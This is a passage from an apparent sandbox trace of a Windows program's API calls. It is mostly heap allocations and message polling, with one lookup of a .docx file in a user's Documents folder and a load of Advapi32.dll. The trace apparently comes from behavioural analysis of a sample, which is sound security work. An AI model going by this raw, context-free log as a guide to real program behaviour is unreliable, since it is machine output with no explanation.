lpMem=0x2a5eb40 | out: hHeap=0x2af0000) returned 1 [0215.733] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf60 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72368 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77a80 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72348 [0215.733] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d78 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaeb8 [0215.733] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0f8 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf00 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721d8 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ad0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a721f8 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaae70 | out: hHeap=0x2af0000) returned 1 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77bc0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf18 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaae70 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d00 | out: hHeap=0x2af0000) returned 1 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.734] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.734] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e40 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.734] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a722d8 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f58 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf90 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab008 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72378 | out: hHeap=0x2af0000) returned 1 [0215.735] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72248 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77aa8 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.735] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72218 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf78 | out: hHeap=0x2af0000) returned 1 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77be8 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf78 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77da0 | out: hHeap=0x2af0000) returned 1 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.736] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaf30 | out: hHeap=0x2af0000) returned 1 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d28 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaf30 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72378 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e68 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72228 [0215.736] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaafc0 | out: hHeap=0x2af0000) returned 1 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77da0 [0215.736] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaafc0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab008 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72398 | out: hHeap=0x2af0000) returned 1 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.737] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab020 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72238 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77e90 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72398 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab0e0 | out: hHeap=0x2af0000) returned 1 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77dc8 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab0e0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaaff0 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722b8 [0215.737] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.737] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.737] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Documents/faIAqUgP BwWKbX.docx", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x979fde90, ftCreationTime.dwHighDateTime=0x1d56be4, ftLastAccessTime.dwLowDateTime=0xedc4b1a0, ftLastAccessTime.dwHighDateTime=0x1d5ac8b, ftLastWriteTime.dwLowDateTime=0xedc4b1a0, ftLastWriteTime.dwHighDateTime=0x1d5ac8b, nFileSizeHigh=0x0, nFileSizeLow=0x96f7, dwReserved0=0x0, dwReserved1=0x0, cFileName="faIAqUgP BwWKbX.docx", cAlternateFileName="FAIAQU~1.DOC")) returned 0x9e2238 [0215.738] FindClose (in: hFindFile=0x9e2238 | out: hFindFile=0x9e2238) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaaff0 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab020 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b48 | out: hHeap=0x2af0000) returned 1 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.738] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.738] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72318 [0215.738] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77cb0 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab338 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72298 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d00 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72278 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab350 | out: hHeap=0x2af0000) returned 1 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77b48 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab350 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab530 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721a8 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab218 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6f8 [0215.739] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab218 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab338 | out: hHeap=0x2af0000) returned 1 [0215.739] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77cb0 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0215.740] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77eb8 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.740] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72238 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.740] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77c38 | out: hHeap=0x2af0000) returned 1 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.740] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.740] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72258 | out: hHeap=0x2af0000) returned 1 [0215.740] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d28 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722b8 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.741] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0215.741] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6f20 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.741] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab440 | out: hHeap=0x2af0000) returned 1 [0215.741] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.742] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721b8 | out: hHeap=0x2af0000) returned 1 [0215.746] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x76390000 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab548 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab6f8 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72328 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77b70 | out: hHeap=0x2af0000) returned 1 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0215.746] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0215.746] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72248 | out: hHeap=0x2af0000) returned 1 [0215.747] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: 